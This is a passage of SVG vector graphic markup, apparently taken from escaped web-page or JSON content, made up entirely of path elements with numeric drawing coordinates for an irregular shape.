d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path 